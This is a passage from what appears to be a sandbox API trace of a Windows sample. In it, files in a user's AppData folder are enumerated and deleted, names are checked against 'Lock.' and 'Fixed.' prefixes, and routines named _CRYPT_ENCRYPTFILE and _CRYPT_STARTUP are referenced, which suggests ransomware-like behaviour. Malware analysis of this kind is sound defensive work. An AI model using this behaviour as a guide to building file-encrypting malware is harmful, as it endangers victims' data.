ftCreationTime.dwLowDateTime=0x9d0bb030, ftCreationTime.dwHighDateTime=0x1d5e5c3, ftLastAccessTime.dwLowDateTime=0x3fa8d630, ftLastAccessTime.dwHighDateTime=0x1d5e50e, ftLastWriteTime.dwLowDateTime=0x3fa8d630, ftLastWriteTime.dwHighDateTime=0x1d5e50e, nFileSizeHigh=0x0, nFileSizeLow=0xb0ca, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ljcsRI_.swf", cAlternateFileName="")) returned 0xa87250 [0234.380] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ljcsRI_.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ljcsri_.swf")) returned 1 [0234.383] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d0bb030, ftCreationTime.dwHighDateTime=0x1d5e5c3, ftLastAccessTime.dwLowDateTime=0x3fa8d630, ftLastAccessTime.dwHighDateTime=0x1d5e50e, ftLastWriteTime.dwLowDateTime=0x3fa8d630, ftLastWriteTime.dwHighDateTime=0x1d5e50e, nFileSizeHigh=0x0, nFileSizeLow=0xb0ca, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ljcsRI_.swf", cAlternateFileName="")) returned 0 [0234.383] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0234.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0234.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0234.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0234.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0234.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0234.383] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0234.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0234.384] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0234.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e564e0 [0234.384] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ljcsRI_.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ljcsRI_.swf", lpFilePart=0x8cf650*="ljcsRI_.swf") returned 0x2b [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0234.384] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ljcsRI_.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ljcsri_.swf")) returned 0xffffffff [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0234.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0234.385] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0234.385] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.385] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0234.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0234.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0234.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MWbKfh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0234.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WbKfh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0234.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bKfh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0234.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kfh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0234.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fh.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0234.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0234.386] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0234.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69be8 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0234.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MWbKfh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0234.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WbKfh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0234.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bKfh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0234.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kfh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0234.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fh.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0234.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0234.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0234.387] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0234.388] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0234.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0234.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0234.388] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0234.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.388] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0234.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0234.390] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.390] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.390] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/MWbKfh.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58df110, ftCreationTime.dwHighDateTime=0x1d5e230, ftLastAccessTime.dwLowDateTime=0xb26a8a90, ftLastAccessTime.dwHighDateTime=0x1d5e759, ftLastWriteTime.dwLowDateTime=0xb26a8a90, ftLastWriteTime.dwHighDateTime=0x1d5e759, nFileSizeHigh=0x0, nFileSizeLow=0x2641, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="MWbKfh.gif", cAlternateFileName="")) returned 0xa875d0 [0234.390] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0234.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0234.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.391] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0234.391] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0234.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0234.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.392] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0234.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0234.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0234.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, 